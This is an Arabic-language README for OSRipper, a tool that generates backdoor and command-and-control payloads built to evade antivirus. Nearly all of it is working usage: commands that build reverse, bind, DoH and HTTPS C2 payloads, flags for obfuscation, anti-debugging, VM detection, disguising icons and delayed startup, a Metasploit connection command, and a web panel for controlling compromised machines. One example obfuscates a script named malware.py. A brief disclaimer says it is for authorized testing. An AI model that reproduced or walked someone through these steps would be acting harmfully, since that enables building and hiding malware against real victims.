
إطار عمل باب خلفي وتشفير متعدد المنصات يتجنب اكتشاف برامج مكافحة الفيروسات، مع واجهة ويب خفيفة الوزن مدمجة.

مُولِّد ومشفر حمولات متقدم عبر المنصات مع قدرات غير قابلة للكشف (FUD)
الميزات • بداية سريعة • واجهة الويب • أنواع الحمولات • التوثيق
OSRipper هو مُولِّد ومشفر باب خلفي متطور، غير قابل للاكتشاف تمامًا (FUD)، مصمم لاختبار الاختراق المأذون به وعمليات الفريق الأحمر. يتميز بتقنيات تهرب متقدمة، وأنواع حمولات متعددة، وواجهة C2 ويب حديثة لإدارة الأنظمة المخترقة.
| نوع الحمولة | الوصف | حالة الاستخدام |
|---|---|---|
| قذيفة ربط (Bind Shell) | يفتح منفذًا على جهاز الضحية | الوصول المباشر عند منع الاتصالات العكسية |
| متربريتر عكسي عبر TCP | اتصال عكسي مشفر عبر SSL/TLS | اختبار الاختراق القياسي |
| DoH C2 (DNS عبر HTTPS) | قيادة وتحكم خفي عبر بروتوكول DoH | تجاوز قيود الشبكة |
| HTTPS C2 | قناة C2 آمنة ومثبتة الشهادة باستخدام HTTPS | قناة C2 آمنة وموثقة |
| حمولة مرحلية (Staged Payload) | توصيل ويب متعدد المراحل | نشر خفي محسّن |
| مشفر أكواد مخصصة | إخفاء أي سكريبت بايثون | تشفير حمولات مخصصة |
# استنساخ المستودع
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# تثبيت التبعيات
pip3 install -r requirements.txt
# تثبيت الحزمة
pip3 install -e .
هام — قم بتشغيل الإعداد للميزات الاختيارية (ngrok، التجميع الثنائي):
على العديد من الأنظمة (خاصة لينكس مع بيئة بايثون مدارة خارجيًا)، يجب عليك تشغيل الإعداد المدمج لتثبيت التبعيات الاختيارية في البيئة الافتراضية الخاصة بـ OSRipper. قم بذلك مرة واحدة بعد التثبيت:
osripper-cli setup
سيؤدي ذلك إلى إنشاء ~/.local/share/osripper/venv، وتثبيت pyngrok و nuitka و sandboxed هناك، وستستخدمها جميع عمليات تشغيل osripper / osripper-cli اللاحقة تلقائيًا. بدون ذلك، سيطلب منك --ngrok و --compile تشغيل الإعداد. استخدم osripper-cli setup --system فقط إذا كنت تفضل تثبيت pip على مستوى النظام/المستخدم بدلاً من البيئة الافتراضية.
الوضع التفاعلي:
osripper
# أو
python3 -m osripper
سطر الأوامر:
# إنشاء قذيفة عكسية
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# إنشاء حمولة DoH C2
osripper-cli doh -d example.com --obfuscate --compile
واجهة الويب:
# بدء خادم C2 مع واجهة الويب
python -m osripper.c2.server example.com --port 5000
# الوصول إلى لوحة التحكم على http://localhost:5000
يتضمن OSRipper واجهة C2 ويب حديثة لإدارة الأنظمة المخترقة.
# الاستخدام الأساسي
python -m osripper.c2.server example.com
# مع HTTPS
python -m osripper.c2.server example.com --https
# منفذ مخصص
python -m osripper.c2.server example.com --port 8080
# مع شهادة مخصصة
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
بمجرد تشغيل الخادم، يمكن الوصول إلى لوحة التحكم على:
http://localhost:5000https://localhost:5000 (إذا تم تفعيله)يفتح منفذًا على جهاز الضحية وينتظر الاتصالات.
osripper-cli bind -p 4444 --obfuscate --compile
الاتصال:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
اتصال عكسي مشفر عبر SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
قناة C2 خفية تستخدم بروتوكول DNS عبر HTTPS. تتجاوز العديد من قيود الشبكة.
# إنشاء الحمولة
osripper-cli doh -d example.com --obfuscate --compile
# بدء خادم C2
python -m osripper.c2.server example.com
الميزات:
HTTPS C2 آمن مع تثبيت الشهادة للمصادقة.
# إنشاء الحمولة (عبر واجهة الويب أو CLI)
# بدء خادم C2 مع HTTPS
python -m osripper.c2.server example.com --https
# الحصول على بصمة الشهادة
curl http://localhost:5000/api/cert-fingerprint
الميزات:
توصيل ويب متعدد المراحل لتعزيز التخفي.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
إخفاء وتشفير أي سكريبت بايثون.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
| الخيار | الوصف |
|---|---|
--obfuscate | تفعيل الإخفاء متعدد الطبقات |
--enhanced | إخفاء محسّن (مكافحة التصحيح، كشف الأجهزة الافتراضية) |
--compile | تجميع إلى ملف ثنائي مستقل |
--icon PATH | أيقونة مخصصة للملف المترجم |
--delay | إضافة تأخير عشوائي عند بدء التشغيل (5-15 ثانية) |
--output, -o NAME | اسم ملف الإخراج |
--quiet, -q | وضع هادئ (إخراج محدود) |
# قذيفة عكسية كاملة الميزات
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 بكل الميزات
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# تشفير سكريبت مخصص
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# استخدام ngrok لعنوان IP ديناميكي
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

┌─────────────────┐
│ الملف الثنائي │
│ المُنشأ │
└─────────────────┘
│
│ تنفيذ
▼
┌──────────────────┐
│ مُحمّل مخفي │
│ (Obfuscated) │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ خادم C2 │
│ (واجهة ويب) │
│ │
└─────────────────┘
│
│ أمر / استجابة
▼
┌─────────────────┐
│ الوكيل │
│ التنفيذ │
└─────────────────┘

# إنشاء حمولة مع ngrok
osripper-cli reverse --ngrok -p 4444
# اتبع التعليمات لإعداد النفق
# نفّذ: ngrok tcp 4444
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /path/to/icon.ico
الإخفاء القياسي:
الإخفاء المحسّن:
# قياسي
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# محسّن
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
# 1. بدء خادم C2 مع HTTPS
python -m osripper.c2.server example.com --https
# 2. الحصول على بصمة الشهادة
curl http://localhost:5000/api/cert-fingerprint
# 3. إنشاء الحمولة بالبصمة (عبر واجهة الويب)
# أو استخدم البصمة في إنشاء الحمولة
نرحب بالمساهمات من مجتمع أبحاث الأمن السيبراني!
git checkout -b feature/mizah-rayeaa)git commit -m 'إضافة ميزة رائعة')git push origin feature/mizah-rayeaa)شكر خاص لمجتمع أبحاث الأمن السيبراني وهذه المشاريع:
هام: تم تطوير هذه الأداة للأغراض التعليمية واختبار الاختراق المأذون به فقط.
المطورون ليسوا مسؤولين عن إساءة استخدام هذا البرنامج. يجب على المستخدمين الامتثال لجميع القوانين واللوائح المعمول بها.